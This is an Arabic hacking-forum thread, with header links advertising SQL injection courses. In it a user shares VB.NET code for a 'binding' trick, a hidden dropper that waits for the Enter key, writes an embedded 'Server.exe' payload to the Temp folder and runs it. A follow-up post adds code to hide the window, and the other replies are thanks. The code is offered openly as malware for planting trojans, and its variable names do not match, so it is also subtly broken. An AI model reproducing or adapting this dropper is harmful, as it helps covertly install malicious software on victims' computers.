1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ تلغيم ] تلغيمة شرطية تعتمد على زر

الموضوع في 'حماية الأجهزة' بواسطة T0rJaNdZ, بتاريخ ‏22 مارس 2016.

كاتب الموضوع : T0rJaNdZ المشاهدات : 184 الردود : 4 ‏22 مارس 2016
حالة الموضوع:
مغلق
  1. غير متصل

    T0rJaNdZ
    rankrank
    Developer

    عضو منذ:
    ‏7 يونيو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    الوظيفة:
    اعمل لنفسي
    الإقامة:

    [​IMG]

    اللهم صلي على محمد وال محمد كما صليت على ابراهيم و ال ابراهيم انك حميد مجيد
    عندما تكون الحروف تائهة علي الشفاه فيعقد معها الكلام ينبثق الشعر فيتغلغل الدفْ إلى الأعماق ~..

    يتسرب من ثقوب الأيام مزيجمن عطر الأمسيات الباقية وتتفتح زهيرات للأمل وتطير الحروف حتى ~..

    تنبلج في الفضاء ونـمنحكن ضوءاً مشمساً أجمل من النهار فننسج من خيوط الشمس و نسطر ~..

    الشعر بلا كلمات ونقدم للأيام بهائها وللحنين تألقه نزداد ابتهاجاً ~..

    ا[آهلآ بكَم ]
    *
    اعضاء زوار منتدى عراق تيم الكرام
    [​IMG]
    تلغيم زر في الكيبورد من خلال كود شرطي
    شرح الكود
    متال انا مخلي بالكود الزر enter
    'لو المستخدم ضغط على حرف انتر يشتغل الشرط وبأمكانك التعديل الكيبورد كامل تحت امرك
    لن اطيل عليكم
    كود:
    Public Class Form1
        Public Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal key As Integer) As Integer
        Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
            Timer1.Start()
        End Sub
        Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
            Dim scream1 As Boolean
            scream1 = GetAsyncKeyState(Keys.Enter) '< مفتاح الكيبورد المراد  انتر
            If scream1 = True Then
                Text = "XX"
            End If
            If Text = "XX" Then
                Dim Dire As String = My.Computer.FileSystem.SpecialDirectories.Temp
                Dim mustafa As String = Dire + "Server.exe"
                IO.File.WriteAllBytes(louai, My.Resources.Server)
                If IO.File.Exists(louai) Then
                    Process.Start(louai)
                End If
            End If
        End Sub
    End Class
    [​IMG]
    سكيورتي ارهابي
    بكر العراقي
    سكريم
    غزة ديزاد
    والى كل مشفرين واعضاء وزوار منتدى شبكة عراق تيم
    بدون استتناء
    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    T0rJaNdZ
    rankrank
    Developer

    عضو منذ:
    ‏7 يونيو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    الوظيفة:
    اعمل لنفسي
    الإقامة:

    رد: تلغيمة شرطية تعتمد على زر

    نسيت اقولكم لازم تضيفو تايمر و تكتبو
    بعد هدا الكود
    Timer1.Start()
    --
    me.hide
    عشان يتم اخفاء الفورم
    وراح يصير الكود بهدا الشكل
    =====

    Timer1.Start()
    me.hide
     


  3. غير متصل

    Otmàn Bê
    rank
    New Developer

    عضو منذ:
    ‏22 مارس 2016
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تلغيمة شرطية تعتمد على زر

    شكرا على الشرح اخي


    [​IMG]



     


  4. غير متصل

    ‏‎Yassin Ruling‎‏
    rankrank
    Developer

    عضو منذ:
    ‏10 يناير 2016
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:

    رد: تلغيمة شرطية تعتمد على زر

    احسنت النشر واصل
     


  5. غير متصل

    حسين رضا
    Developer

    عضو منذ:
    ‏6 فبراير 2016
    عدد المشاركات:
    الإعجابات المتلقاة:
    15
    نقاط الجائزة:

    رد: تلغيمة شرطية تعتمد على زر

    عاشت الايادي :{1!}::{1!}:
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...